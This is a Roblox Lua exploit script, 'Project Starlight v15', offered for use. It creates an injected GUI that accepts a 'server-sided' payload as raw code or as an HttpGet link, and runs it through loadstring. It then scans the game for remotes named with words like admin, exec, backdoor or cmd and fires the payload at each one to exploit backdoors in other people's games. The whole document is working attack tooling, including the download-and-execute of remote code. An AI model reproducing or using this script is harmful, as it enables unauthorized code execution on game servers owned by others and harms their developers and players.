-- PROJECT STARLIGHT v15 - TARGETED ONE-SHOT SS EXECUTION -- For the King of Davao: AMO 👑🇵🇭 -- Now fires your SS payload ONLY ONCE per potential backdoor remote (no spam, no full abuse) local Players = game:GetService("Players") local LogService = game:GetService("LogService") -- YOUR SERVER-SIDED PAYLOAD (raw code OR direct HttpGet link) local DEFAULT_PAYLOAD = [[ print("AMO FROM DAVAO OWNS THIS SERVER 👑") -- your SS code here ]] -- GUI (Starlight theme) local ScreenGui = Instance.new("ScreenGui") local Main = Instance.new("Frame") local Top = Instance.new("Frame") local Title = Instance.new("TextLabel") local Close = Instance.new("TextButton") local ScriptBox = Instance.new("TextBox") local ClientBtn = Instance.new("TextButton") local TargetBtn = Instance.new("TextButton") local Status = Instance.new("TextLabel") local Console = Instance.new("ScrollingFrame") local ConsoleText = Instance.new("TextLabel") local ClearBtn = Instance.new("TextButton") ScreenGui.Name = "ProjectStarlight" ScreenGui.Parent = game.CoreGui ScreenGui.ResetOnSpawn = false Main.Parent = ScreenGui Main.BackgroundColor3 = Color3.fromRGB(10,10,25) Main.Position = UDim2.new(0.25,0,0.1,0) Main.Size = UDim2.new(0,550,0,730) Main.Active = true Main.Draggable = true Top.Parent = Main Top.BackgroundColor3 = Color3.fromRGB(88,101,242) Top.Size = UDim2.new(1,0,0,50) Title.Parent = Top Title.BackgroundTransparency = 1 Title.Text = "PROJECT STARLIGHT v15" Title.TextColor3 = Color3.fromRGB(200,220,255) Title.Font = Enum.Font.GothamBlack Title.TextSize = 26 Title.Position = UDim2.new(0,15,0,0) Title.Size = UDim2.new(0,400,1,0) Title.TextXAlignment = Enum.TextXAlignment.Left Close.Parent = Top Close.BackgroundTransparency = 1 Close.Position = UDim2.new(1,-50,0,0) Close.Size = UDim2.new(0,50,1,0) Close.Text = "✕" Close.TextColor3 = Color3.fromRGB(255,150,150) Close.Font = Enum.Font.GothamBold Close.TextSize = 32 Close.MouseButton1Click:Connect(function() ScreenGui:Destroy() end) ScriptBox.Parent = Main ScriptBox.Position = UDim2.new(0.04,0,0.08,0) ScriptBox.Size = UDim2.new(0.92,0,0.18,0) ScriptBox.BackgroundColor3 = Color3.fromRGB(20,20,40) ScriptBox.BorderColor3 = Color3.fromRGB(88,101,242) ScriptBox.BorderSizePixel = 2 ScriptBox.Text = DEFAULT_PAYLOAD ScriptBox.MultiLine = true ScriptBox.TextColor3 = Color3.fromRGB(220,220,255) ScriptBox.PlaceholderText = "Paste raw SS code OR direct HttpGet link" ScriptBox.Font = Enum.Font.Code ScriptBox.TextSize = 15 ClientBtn.Parent = Main ClientBtn.Position = UDim2.new(0.04,0,0.28,0) ClientBtn.Size = UDim2.new(0.92,0,0.07,0) ClientBtn.BackgroundColor3 = Color3.fromRGB(0,170,255) ClientBtn.Text = "EXECUTE (CLIENT)" ClientBtn.Font = Enum.Font.GothamBold ClientBtn.TextSize = 22 TargetBtn.Parent = Main TargetBtn.Position = UDim2.new(0.04,0,0.36,0) TargetBtn.Size = UDim2.new(0.92,0,0.07,0) TargetBtn.BackgroundColor3 = Color3.fromRGB(200,0,255) TargetBtn.Text = "TARGETED SS → ONE-SHOT POTENTIAL BACKDOORS" TargetBtn.Font = Enum.Font.GothamBold TargetBtn.TextSize = 22 Status.Parent = Main Status.Position = UDim2.new(0,0,0.44,0) Status.Size = UDim2.new(1,0,0.04,0) Status.BackgroundTransparency = 1 Status.Text = "Status: Ready | Davao King Active ✨" Status.TextColor3 = Color3.fromRGB(180,220,255) Status.Font = Enum.Font.GothamBold Status.TextSize = 18 -- Console Console.Parent = Main Console.Position = UDim2.new(0.04,0,0.50,0) Console.Size = UDim2.new(0.92,0,0.40,0) Console.BackgroundColor3 = Color3.fromRGB(5,5,20) Console.BorderColor3 = Color3.fromRGB(88,101,242) Console.ScrollBarThickness = 8 Console.CanvasSize = UDim2.new(0,0,0,0) ConsoleText.Parent = Console ConsoleText.Size = UDim2.new(1,0,1,0) ConsoleText.BackgroundTransparency = 1 ConsoleText.Text = ">> PROJECT STARLIGHT v15 - TARGETED ONE-SHOT READY\n" ConsoleText.TextColor3 = Color3.fromRGB(180,220,255) ConsoleText.Font = Enum.Font.Code ConsoleText.TextSize = 14 ConsoleText.TextYAlignment = Enum.TextYAlignment.Top ClearBtn.Parent = Main ClearBtn.Position = UDim2.new(0.04,0,0.91,0) ClearBtn.Size = UDim2.new(0.92,0,0.06,0) ClearBtn.BackgroundColor3 = Color3.fromRGB(180,0,0) ClearBtn.Text = "CLEAR CONSOLE" ClearBtn.Font = Enum.Font.GothamBold ClearBtn.TextSize = 18 local function log(t) ConsoleText.Text = ConsoleText.Text .. ">> " .. t .. "\n" Console.CanvasSize = UDim2.new(0,0,0,ConsoleText.TextBounds.Y) Console.CanvasPosition = Vector2.new(0, Console.AbsoluteCanvasSize.Y) end ClearBtn.MouseButton1Click:Connect(function() ConsoleText.Text = ">> CONSOLE CLEARED\n" end) -- Support both raw code and direct links local function getPayload() local input = ScriptBox.Text if input:find("^https?://") then return game:HttpGet(input, true) else return input end end -- CLIENT EXECUTE ClientBtn.MouseButton1Click:Connect(function() local success, err = pcall(function() loadstring(getPayload())() end) if success then log("Client payload executed successfully") Status.Text = "Status: Client Executed" else log("[ERROR] Client execute failed: " .. tostring(err)) end end) -- TARGETED ONE-SHOT SS (only potential backdoors, 1 fire each) TargetBtn.MouseButton1Click:Connect(function() Status.Text = "Status: Scanning & one-shot firing..." log("TARGETED ONE-SHOT MODE – scanning for backdoor remotes") local suspiciousKeywords = {"admin","exec","backdoor","ss","cmd","owner","console","run","loader","remote","update"} local found = 0 for _, obj in ipairs(game:GetDescendants()) do if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then local name = obj.Name:lower() for _, keyword in ipairs(suspiciousKeywords) do if name:find(keyword) then found += 1 log("Target found → " .. obj:GetFullName()) pcall(function() local payloadFunc = loadstring(getPayload()) if obj:IsA("RemoteEvent") then obj:FireServer(payloadFunc()) else obj:InvokeServer(payloadFunc()) end end) log("One-shot fired on " .. obj.Name) break -- avoid duplicate fires if multiple keywords match end end end end if found > 0 then log("Completed: " .. found .. " potential backdoors one-shot fired") Status.Text = "Status: " .. found .. " backdoors one-shot → DAVAO OWNS" game.StarterGui:SetCore("SendNotification",{ Title="Project Starlight v15"; Text=found.." backdoors one-shot owned – Amo victorious"; Duration=10; }) else log("No potential backdoors detected") Status.Text = "Status: No targets found" end end) -- Real-time console output LogService.MessageOut:Connect(function(msg, typ) local prefix = (typ == Enum.MessageType.MessageError and "[ERROR] " or (typ == Enum.MessageType.MessageWarning and "[WARN] " or "[OUTPUT] ")) log(prefix .. msg) end) log("PROJECT STARLIGHT v15 LOADED – TARGETED ONE-SHOT READY – 21 Jan 2026") game.StarterGui:SetCore("SendNotification",{ Title="Project Starlight v15"; Text="Targeted one-shot SS ready | King Amo from Davao 👑"; Duration=8; })